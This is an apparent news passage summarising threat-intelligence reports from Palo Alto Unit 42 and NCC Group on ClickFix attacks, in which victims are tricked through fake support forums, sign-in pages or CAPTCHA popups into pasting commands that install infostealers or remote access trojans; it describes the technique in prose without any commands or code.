Researchers at Palo Alto Networks Unit 42 threat intelligence division have also reported seeing more ClickFix attacks. In a July report, they said attackers lure victims into copying and pasting commands to apply quick fixes to common computer issues such as performance problems, missing drivers, or pop-up errors. Fake tech support forums are one way these attack start. Threat actors have also been known, in other campaigns, to use fake DocuSign and Okta single-sign-on pages to trick users. Payloads include infostealers, remote access trojans (RATS), or tools that disable security.
“This delivery method bypasses many standard detection and prevention controls” says the Palo Alto report. “There is no exploit, phishing attachment, or malicious link. Instead, potential victims unknowingly run the command themselves, through a trusted system shell. This method makes infections from ClickFix more complicated to detect than drive-by downloads or traditional malware droppers.”
In yet another instance, researchers at NCC Group today issued this report on a ClickFix attack they discovered in May that involved a drive-by compromise and the use of a fake CAPTCHA popup, with the goal of installing the Lumma C2 Stealer.
